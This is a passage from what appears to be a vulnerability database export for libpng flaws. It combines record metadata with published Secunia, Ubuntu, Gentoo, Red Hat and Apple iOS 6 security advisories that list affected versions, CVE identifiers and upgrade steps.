"id": "52285",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-200611-295",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000961",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2006-5793",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2006-11-14T00:00:00",
"db": "BID",
"id": "21078",
"ident": null
},
{
"date": "2006-11-18T01:00:18",
"db": "PACKETSTORM",
"id": "52280",
"ident": null
},
{
"date": "2008-10-13T22:53:24",
"db": "PACKETSTORM",
"id": "70882",
"ident": null
},
{
"date": "2006-11-18T01:43:05",
"db": "PACKETSTORM",
"id": "52284",
"ident": null
},
{
"date": "2006-11-18T01:44:10",
"db": "PACKETSTORM",
"id": "52286",
"ident": null
},
{
"date": "2006-11-18T01:44:43",
"db": "PACKETSTORM",
"id": "52287",
"ident": null
},
{
"date": "2008-03-04T22:33:55",
"db": "PACKETSTORM",
"id": "64260",
"ident": null
},
{
"date": "2006-11-18T01:43:39",
"db": "PACKETSTORM",
"id": "52285",
"ident": null
},
{
"date": "2006-11-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200611-295",
"ident": null
},
{
"date": "2007-06-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2006-000961",
"ident": null
},
{
"date": "2006-11-17T23:07:00",
"db": "NVD",
"id": "CVE-2006-5793",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2008-03-19T02:30:00",
"db": "BID",
"id": "21078",
"ident": null
},
{
"date": "2006-11-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200611-295",
"ident": null
},
{
"date": "2009-04-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2006-000961",
"ident": null
},
{
"date": "2025-04-09T00:30:58.490000",
"db": "NVD",
"id": "CVE-2006-5793",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200611-295"
}
],
"trust": 0.6
},
"title": {
"_id": null,
"data": "libpng of png_set_sPLT() Denial of service in function (DoS) Vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2006-000961"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "input validation",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200611-295"
}
],
"trust": 0.6
}
}
VAR-201202-0137
Vulnerability from variot - Updated: 2026-03-09 20:07Integer overflow in libpng, as used in Google Chrome before 17.0.963.56, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that trigger an integer truncation. Autonomy Keyview IDOL contains multiple vulnerabilities in file parsers. These vulnerabilities could allow a remote attacker to execute arbitrary code on an affected system. libpng is prone to a remote integer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Failed exploit attempts will likely crash the library. Micro Focus Autonomy KeyView IDOL is a library from Micro Focus UK that can decode more than 1000 different file formats. A security vulnerability exists in Micro Focus Autonomy KeyView IDOL versions prior to 10.16. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
TITLE: Symantec Products KeyView File Processing Vulnerabilities
SECUNIA ADVISORY ID: SA51365
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/51365/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=51365
RELEASE DATE: 2012-11-21
DISCUSS ADVISORY: http://secunia.com/advisories/51365/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/51365/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=51365
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Symantec has acknowledged some vulnerabilities in multiple products, which can be exploited by malicious people to compromise a vulnerable system.
For more information: SA51362
The vulnerabilities are reported in the following products: * Symantec Mail Security for Microsoft Exchange (SMSMSE) versions 6.5.x * Symantec Mail Security for Domino (SMSDOM) versions 8.1.x * Symantec Messaging Gateway (SMG) versions 9.5.x * Symantec Data Loss Prevention(DLP) Enforce/Detection Servers for Windows versions 11.x * Symantec Data Loss Prevention Enforce/Detection Servers for Linux versions 11.x * Symantec Data Loss Prevention Endpoint Agents versions 11.x
SOLUTION: Update of upgrade to a fixed version.
Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
ORIGINAL ADVISORY: Symantec: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20121120_00
US-CERT: http://www.kb.cert.org/vuls/id/849841
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. ============================================================================ Ubuntu Security Notice USN-1367-2 February 17, 2012
firefox vulnerability
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 11.10
- Ubuntu 11.04
- Ubuntu 10.10
- Ubuntu 10.04 LTS
Summary:
Firefox could be made to crash or run programs as your login if it opened a specially crafted file.
Original advisory details:
Jueri Aedla discovered that libpng did not properly verify the size used when allocating memory during chunk decompression. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201206-15
http://security.gentoo.org/
Severity: Normal Title: libpng: Multiple vulnerabilities Date: June 22, 2012 Bugs: #373967, #386185, #401987, #404197, #410153 ID: 201206-15
Synopsis
Multiple vulnerabilities in libpng might allow remote attackers to execute arbitrary code or cause a Denial of Service condition. It is used by several programs, including web browsers and potentially server processes.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 media-libs/libpng < 1.5.10 >= 1.5.10 *>= 1.2.49
Description
Multiple vulnerabilities have been discovered in libpng:
- The "embedded_profile_len()" function in pngwutil.c does not check for negative values, resulting in a memory leak (CVE-2009-5063).
- The "png_format_buffer()" function in pngerror.c contains an off-by-one error (CVE-2011-2501).
- The "png_rgb_to_gray()" function in pngrtran.c contains an integer overflow error (CVE-2011-2690).
- The "png_err()" function in pngerror.c contains a NULL pointer dereference error (CVE-2011-2691).
- The "png_handle_sCAL()" function in pngrutil.c improperly handles malformed sCAL chunks(CVE-2011-2692).
- The "png_decompress_chunk()" function in pngrutil.c contains an integer overflow error (CVE-2011-3026).
- The "png_inflate()" function in pngrutil.c contains and out of bounds error (CVE-2011-3045).
- The "png_set_text_2()" function in pngset.c contains an error which could result in memory corruption (CVE-2011-3048).
- The "png_formatted_warning()" function in pngerror.c contains an off-by-one error (CVE-2011-3464).
Workaround
There is no known workaround at this time.
Resolution
All libpng 1.5 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/libpng-1.5.10"
All libpng 1.2 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/libpng-1.2.49"
Packages which depend on this library may need to be recompiled. Tools such as revdep-rebuild may assist in identifying some of these packages.
References
[ 1 ] CVE-2009-5063 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-5063 [ 2 ] CVE-2011-2501 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2501 [ 3 ] CVE-2011-2690 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2690 [ 4 ] CVE-2011-2691 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2691 [ 5 ] CVE-2011-2692 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2692 [ 6 ] CVE-2011-3026 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3026 [ 7 ] CVE-2011-3045 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3045 [ 8 ] CVE-2011-3048 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3048 [ 9 ] CVE-2011-3464 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3464
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201206-15.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . Summary:
Updated seamonkey packages that fix one security issue are now available for Red Hat Enterprise Linux 4.
The Red Hat Security Response Team has rated this update as having critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux AS version 4 - i386, ia64, ppc, s390, s390x, x86_64 Red Hat Enterprise Linux Desktop version 4 - i386, x86_64 Red Hat Enterprise Linux ES version 4 - i386, ia64, x86_64 Red Hat Enterprise Linux WS version 4 - i386, ia64, x86_64
- Description:
SeaMonkey is an open source web browser, e-mail and newsgroup client, IRC chat client, and HTML editor.
A heap-based buffer overflow flaw was found in the way SeaMonkey handled PNG (Portable Network Graphics) images. (CVE-2011-3026)
All SeaMonkey users should upgrade to these updated packages, which correct this issue. After installing the update, SeaMonkey must be restarted for the changes to take effect.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259
- Bugs fixed (http://bugzilla.redhat.com/):
790737 - CVE-2011-3026 libpng: Heap-buffer-overflow in png_decompress_chunk
- Package List:
Red Hat Enterprise Linux AS version 4:
Source: ftp://updates.redhat.com/enterprise/4AS/en/os/SRPMS/seamonkey-1.0.9-79.el4.src.rpm
i386: seamonkey-1.0.9-79.el4.i386.rpm seamonkey-chat-1.0.9-79.el4.i386.rpm seamonkey-debuginfo-1.0.9-79.el4.i386.rpm seamonkey-devel-1.0.9-79.el4.i386.rpm seamonkey-dom-inspector-1.0.9-79.el4.i386.rpm seamonkey-js-debugger-1.0.9-79.el4.i386.rpm seamonkey-mail-1.0.9-79.el4.i386.rpm
ia64: seamonkey-1.0.9-79.el4.ia64.rpm seamonkey-chat-1.0.9-79.el4.ia64.rpm seamonkey-debuginfo-1.0.9-79.el4.ia64.rpm seamonkey-devel-1.0.9-79.el4.ia64.rpm seamonkey-dom-inspector-1.0.9-79.el4.ia64.rpm seamonkey-js-debugger-1.0.9-79.el4.ia64.rpm seamonkey-mail-1.0.9-79.el4.ia64.rpm
ppc: seamonkey-1.0.9-79.el4.ppc.rpm seamonkey-chat-1.0.9-79.el4.ppc.rpm seamonkey-debuginfo-1.0.9-79.el4.ppc.rpm seamonkey-devel-1.0.9-79.el4.ppc.rpm seamonkey-dom-inspector-1.0.9-79.el4.ppc.rpm seamonkey-js-debugger-1.0.9-79.el4.ppc.rpm seamonkey-mail-1.0.9-79.el4.ppc.rpm
s390: seamonkey-1.0.9-79.el4.s390.rpm seamonkey-chat-1.0.9-79.el4.s390.rpm seamonkey-debuginfo-1.0.9-79.el4.s390.rpm seamonkey-devel-1.0.9-79.el4.s390.rpm seamonkey-dom-inspector-1.0.9-79.el4.s390.rpm seamonkey-js-debugger-1.0.9-79.el4.s390.rpm seamonkey-mail-1.0.9-79.el4.s390.rpm
s390x: seamonkey-1.0.9-79.el4.s390x.rpm seamonkey-chat-1.0.9-79.el4.s390x.rpm seamonkey-debuginfo-1.0.9-79.el4.s390x.rpm seamonkey-devel-1.0.9-79.el4.s390x.rpm seamonkey-dom-inspector-1.0.9-79.el4.s390x.rpm seamonkey-js-debugger-1.0.9-79.el4.s390x.rpm seamonkey-mail-1.0.9-79.el4.s390x.rpm
x86_64: seamonkey-1.0.9-79.el4.x86_64.rpm seamonkey-chat-1.0.9-79.el4.x86_64.rpm seamonkey-debuginfo-1.0.9-79.el4.x86_64.rpm seamonkey-devel-1.0.9-79.el4.x86_64.rpm seamonkey-dom-inspector-1.0.9-79.el4.x86_64.rpm seamonkey-js-debugger-1.0.9-79.el4.x86_64.rpm seamonkey-mail-1.0.9-79.el4.x86_64.rpm
Red Hat Enterprise Linux Desktop version 4:
Source: ftp://updates.redhat.com/enterprise/4Desktop/en/os/SRPMS/seamonkey-1.0.9-79.el4.src.rpm
i386: seamonkey-1.0.9-79.el4.i386.rpm seamonkey-chat-1.0.9-79.el4.i386.rpm seamonkey-debuginfo-1.0.9-79.el4.i386.rpm seamonkey-devel-1.0.9-79.el4.i386.rpm seamonkey-dom-inspector-1.0.9-79.el4.i386.rpm seamonkey-js-debugger-1.0.9-79.el4.i386.rpm seamonkey-mail-1.0.9-79.el4.i386.rpm
x86_64: seamonkey-1.0.9-79.el4.x86_64.rpm seamonkey-chat-1.0.9-79.el4.x86_64.rpm seamonkey-debuginfo-1.0.9-79.el4.x86_64.rpm seamonkey-devel-1.0.9-79.el4.x86_64.rpm seamonkey-dom-inspector-1.0.9-79.el4.x86_64.rpm seamonkey-js-debugger-1.0.9-79.el4.x86_64.rpm seamonkey-mail-1.0.9-79.el4.x86_64.rpm
Red Hat Enterprise Linux ES version 4:
Source: ftp://updates.redhat.com/enterprise/4ES/en/os/SRPMS/seamonkey-1.0.9-79.el4.src.rpm
i386: seamonkey-1.0.9-79.el4.i386.rpm seamonkey-chat-1.0.9-79.el4.i386.rpm seamonkey-debuginfo-1.0.9-79.el4.i386.rpm seamonkey-devel-1.0.9-79.el4.i386.rpm seamonkey-dom-inspector-1.0.9-79.el4.i386.rpm seamonkey-js-debugger-1.0.9-79.el4.i386.rpm seamonkey-mail-1.0.9-79.el4.i386.rpm
ia64: seamonkey-1.0.9-79.el4.ia64.rpm seamonkey-chat-1.0.9-79.el4.ia64.rpm seamonkey-debuginfo-1.0.9-79.el4.ia64.rpm seamonkey-devel-1.0.9-79.el4.ia64.rpm seamonkey-dom-inspector-1.0.9-79.el4.ia64.rpm seamonkey-js-debugger-1.0.9-79.el4.ia64.rpm seamonkey-mail-1.0.9-79.el4.ia64.rpm
x86_64: seamonkey-1.0.9-79.el4.x86_64.rpm seamonkey-chat-1.0.9-79.el4.x86_64.rpm seamonkey-debuginfo-1.0.9-79.el4.x86_64.rpm seamonkey-devel-1.0.9-79.el4.x86_64.rpm seamonkey-dom-inspector-1.0.9-79.el4.x86_64.rpm seamonkey-js-debugger-1.0.9-79.el4.x86_64.rpm seamonkey-mail-1.0.9-79.el4.x86_64.rpm
Red Hat Enterprise Linux WS version 4:
Source: ftp://updates.redhat.com/enterprise/4WS/en/os/SRPMS/seamonkey-1.0.9-79.el4.src.rpm
i386: seamonkey-1.0.9-79.el4.i386.rpm seamonkey-chat-1.0.9-79.el4.i386.rpm seamonkey-debuginfo-1.0.9-79.el4.i386.rpm seamonkey-devel-1.0.9-79.el4.i386.rpm seamonkey-dom-inspector-1.0.9-79.el4.i386.rpm seamonkey-js-debugger-1.0.9-79.el4.i386.rpm seamonkey-mail-1.0.9-79.el4.i386.rpm
ia64: seamonkey-1.0.9-79.el4.ia64.rpm seamonkey-chat-1.0.9-79.el4.ia64.rpm seamonkey-debuginfo-1.0.9-79.el4.ia64.rpm seamonkey-devel-1.0.9-79.el4.ia64.rpm seamonkey-dom-inspector-1.0.9-79.el4.ia64.rpm seamonkey-js-debugger-1.0.9-79.el4.ia64.rpm seamonkey-mail-1.0.9-79.el4.ia64.rpm
x86_64: seamonkey-1.0.9-79.el4.x86_64.rpm seamonkey-chat-1.0.9-79.el4.x86_64.rpm seamonkey-debuginfo-1.0.9-79.el4.x86_64.rpm seamonkey-devel-1.0.9-79.el4.x86_64.rpm seamonkey-dom-inspector-1.0.9-79.el4.x86_64.rpm seamonkey-js-debugger-1.0.9-79.el4.x86_64.rpm seamonkey-mail-1.0.9-79.el4.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2011-3026.html https://access.redhat.com/security/updates/classification/#critical
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2012 Red Hat, Inc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
APPLE-SA-2012-09-19-1 iOS 6
iOS 6 is now available and addresses the following:
CFNetwork Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to the disclosure of sensitive information Description: An issue existed in CFNetwork's handling of malformed URLs. CFNetwork may send requests to an incorrect hostname, resulting in the disclosure of sensitive information. This issue was addressed through improvements to URL handling. CVE-ID CVE-2012-3724 : Erling Ellingsen of Facebook
CoreGraphics Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Multiple vulnerabilities in FreeType Description: Multiple vulnerabilities existed in FreeType, the most serious of which may lead to arbitrary code execution when processing a maliciously crafted font. These issues were addressed by updating FreeType to version 2.4.9. Further information is available via the FreeType site at http://www.freetype.org/ CVE-ID CVE-2012-1126 CVE-2012-1127 CVE-2012-1128 CVE-2012-1129 CVE-2012-1130 CVE-2012-1131 CVE-2012-1132 CVE-2012-1133 CVE-2012-1134 CVE-2012-1135 CVE-2012-1136 CVE-2012-1137 CVE-2012-1138 CVE-2012-1139 CVE-2012-1140 CVE-2012-1141 CVE-2012-1142 CVE-2012-1143 CVE-2012-1144
CoreMedia Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: An uninitialized memory access existed in the handling of Sorenson encoded movie files. This issue was addressed through improved memory initialization. CVE-ID CVE-2012-3722 : Will Dormann of the CERT/CC
DHCP Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: A malicious Wi-Fi network may be able to determine networks a device has previously accessed Description: Upon connecting to a Wi-Fi network, iOS may broadcast MAC addresses of previously accessed networks per the DNAv4 protocol. This issue was addressed by disabling DNAv4 on unencrypted Wi-Fi networks. CVE-ID CVE-2012-3725 : Mark Wuergler of Immunity, Inc.
ImageIO Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Viewing a maliciously crafted TIFF file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in libtiff's handling of ThunderScan encoded TIFF images. This issue was addressed by updating libtiff to version 3.9.5. CVE-ID CVE-2011-1167
ImageIO Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Viewing a maliciously crafted PNG image may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in libpng's handling of PNG images. These issues were addressed through improved validation of PNG images. CVE-ID CVE-2011-3026 : Juri Aedla CVE-2011-3048 CVE-2011-3328
ImageIO Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Viewing a maliciously crafted JPEG image may lead to an unexpected application termination or arbitrary code execution Description: A double free issue existed in ImageIO's handling of JPEG images. This issue was addressed through improved memory management. CVE-ID CVE-2012-3726 : Phil of PKJE Consulting
ImageIO Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution Description: An integer overflow issue existed in libTIFF's handling of TIFF images. This issue was addressed through improved validation of TIFF images. CVE-ID CVE-2012-1173 : Alexander Gavrun working with HP's Zero Day Initiative
International Components for Unicode Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Applications that use ICU may be vulnerable to an unexpected application termination or arbitrary code execution Description: A stack buffer overflow existed in the handling of ICU locale IDs. This issue was addressed through improved bounds checking. CVE-ID CVE-2011-4599
IPSec Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Loading a maliciously crafted racoon configuration file may lead to arbitrary code execution Description: A buffer overflow existed in the handling of racoon configuration files. This issue was addressed through improved bounds checking. CVE-ID CVE-2012-3727 : iOS Jailbreak Dream Team
Kernel Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: A local user may be able to execute arbitrary code with system privileges Description: An invalid pointer dereference issue existed in the kernel's handling of packet filter ioctls. This may allow an attacker to alter kernel memory. This issue was addressed through improved error handling. CVE-ID CVE-2012-3728 : iOS Jailbreak Dream Team
Kernel Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: A local user may be able to determine kernel memory layout Description: An uninitialized memory access issue existed in the Berkeley Packet Filter interpreter, which led to the disclosure of memory content. This issue was addressed through improved memory initialization. CVE-ID CVE-2012-3729 : Dan Rosenberg
libxml Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Viewing a maliciously crafted web page may lead to an unexpected application termination or arbitrary code execution Description: Multiple vulnerabilities existed in libxml, the most serious of which may lead to an unexpected application termination or arbitrary code execution. These issues were addressed by applying the relevant upstream patches. CVE-ID CVE-2011-1944 : Chris Evans of Google Chrome Security Team CVE-2011-2821 : Yang Dingning of NCNIPC, Graduate University of Chinese Academy of Sciences CVE-2011-2834 : Yang Dingning of NCNIPC, Graduate University of Chinese Academy of Sciences CVE-2011-3919 : Juri Aedla
Mail Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Mail may present the wrong attachment in a message Description: A logic issue existed in Mail's handling of attachments. If a subsequent mail attachment used the same Content-ID as a previous one, the previous attachment would be displayed, even in the case where the 2 mails originated from different senders. This could facilitate some spoofing or phishing attacks. This issue was addressed through improved handling of attachments. CVE-ID CVE-2012-3730 : Angelo Prado of the salesforce.com Product Security Team
Mail Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Email attachments may be read without user's passcode Description: A logic issue existed in Mail's use of Data Protection on email attachments. This issue was addressed by properly setting the Data Protection class for email attachments. CVE-ID CVE-2012-3731 : Stephen Prairie of Travelers Insurance, Erich Stuntebeck of AirWatch
Mail Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: An attacker may spoof the sender of a S/MIME signed message Description: S/MIME signed messages displayed the untrusted 'From' address, instead of the name associated with the message signer's identity. This issue was addressed by displaying the address associated with the message signer's identity when it is available. CVE-ID CVE-2012-3732 : An anonymous researcher
Messages Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: A user may unintentionally disclose the existence of their email addresses Description: When a user had multiple email addresses associated with iMessage, replying to a message may have resulted in the reply being sent from a different email address. This may disclose another email address associated to the user's account. This issue was addressed by always replying from the email address the original message was sent to. CVE-ID CVE-2012-3733 : Rodney S. Foley of Gnomesoft, LLC
Office Viewer Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Unencrypted document data may be written to a temporary file Description: An information disclosure issue existed in the support for viewing Microsoft Office files. When viewing a document, the Office Viewer would write a temporary file containing data from the viewed document to the temporary directory of the invoking process. For an application that uses data protection or other encryption to protect the user's files, this could lead to information disclosure. This issue was addressed by avoiding creation of temporary files when viewing Office documents. CVE-ID CVE-2012-3734 : Salvatore Cataudella of Open Systems Technologies
OpenGL Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Applications that use OS X's OpenGL implementation may be vulnerable to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in the handling of GLSL compilation. These issues were addressed through improved validation of GLSL shaders. CVE-ID CVE-2011-3457 : Chris Evans of the Google Chrome Security Team, and Marc Schoenefeld of the Red Hat Security Response Team
Passcode Lock Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: A person with physical access to the device could briefly view the last used third-party app on a locked device Description: A logic issue existed with the display of the "Slide to Power Off" slider on the lock screen. This issue was addressed through improved lock state management. CVE-ID CVE-2012-3735 : Chris Lawrence DBB
Passcode Lock Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: A person with physical access to the device may be able to bypass the screen lock Description: A logic issue existed in the termination of FaceTime calls from the lock screen. This issue was addressed through improved lock state management. CVE-ID CVE-2012-3736 : Ian Vitek of 2Secure AB
Passcode Lock Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: All photos may be accessible at the lock screen Description: A design issue existed in the support for viewing photos that were taken at the lock screen. In order to determine which photos to permit access to, the passcode lock consulted the time at which the device was locked and compared it to the time that a photo was taken. By spoofing the current time, an attacker could gain access to photos that were taken before the device was locked. This issues was addressed by explicitly keeping track of the photos that were taken while the device was locked. CVE-ID CVE-2012-3737 : Ade Barkah of BlueWax Inc.
Passcode Lock Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: A person with physical access to a locked device may perform FaceTime calls Description: A logic issue existed in the Emergency Dialer screen, which permitted FaceTime calls via Voice Dialing on the locked device. This could also disclose the user's contacts via contact suggestions. This issue was addressed by disabling Voice Dialing on the Emergency Dialer screen. CVE-ID CVE-2012-3738 : Ade Barkah of BlueWax Inc.
Passcode Lock Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: A person with physical access to the device may be able to bypass the screen lock Description: Using the camera from the screen lock could in some cases interfere with automatic lock functionality, allowing a person with physical access to the device to bypass the Passcode Lock screen. This issue was addressed through improved lock state management. CVE-ID CVE-2012-3739 : Sebastian Spanninger of the Austrian Federal Computing Centre (BRZ)
Passcode Lock Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: A person with physical access to the device may be able to bypass the screen lock Description: A state management issue existed in the handling of the screen lock. This issue was addressed through improved lock state management. CVE-ID CVE-2012-3740 : Ian Vitek of 2Secure AB
Restrictions Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: A user may be able to make purchases without entering Apple ID credentials Description: After disabling Restrictions, iOS may not ask for the user's password during a transaction. This issue was addressed by additional enforcement of purchase authorization. CVE-ID CVE-2012-3741 : Kevin Makens of Redwood High School
Safari Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Websites may use characters with an appearance similar to the lock icon in their titles Description: Websites could use a Unicode character to create a lock icon in the page title. This icon was similar in appearance to the icon used to indicate a secure connection, and could have lead the user to believe a secure connection had been established. This issue was addressed by removing these characters from page titles. CVE-ID CVE-2012-3742 : Boku Kihara of Lepidum
Safari Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Passwords may autocomplete even when the site specifies that autocomplete should be disabled Description: Password input elements with the autocomplete attribute set to "off" were being autocompleted. This issue was addressed through improved handling of the autocomplete attribute. CVE-ID CVE-2012-0680 : Dan Poltawski of Moodle
System Logs Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Sandboxed apps may obtain system log content Description: Sandboxed apps had read access to /var/log directory, which may allow them to obtain sensitive information contained in system logs. This issue was addressed by denying sandboxed apps access to the /var/log directory. CVE-ID CVE-2012-3743
Telephony Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: An SMS message may appear to have been sent by an arbitrary user Description: Messages displayed the return address of an SMS message as the sender. Return addresses may be spoofed. This issue was addressed by always displaying the originating address instead of the return address. CVE-ID CVE-2012-3744 : pod2g
Telephony Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: An SMS message may disrupt cellular connectivity Description: An off-by-one buffer overflow existed in the handling of SMS user data headers. This issue was addressed through improved bounds checking. CVE-ID CVE-2012-3745 : pod2g
UIKit Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: An attacker that gains access to a device's filesystem may be able to read files that were being displayed in a UIWebView Description: Applications that use UIWebView may leave unencrypted files on the file system even when a passcode is enabled. This issue was addressed through improved use of data protection. CVE-ID CVE-2012-3746 : Ben Smith of Box
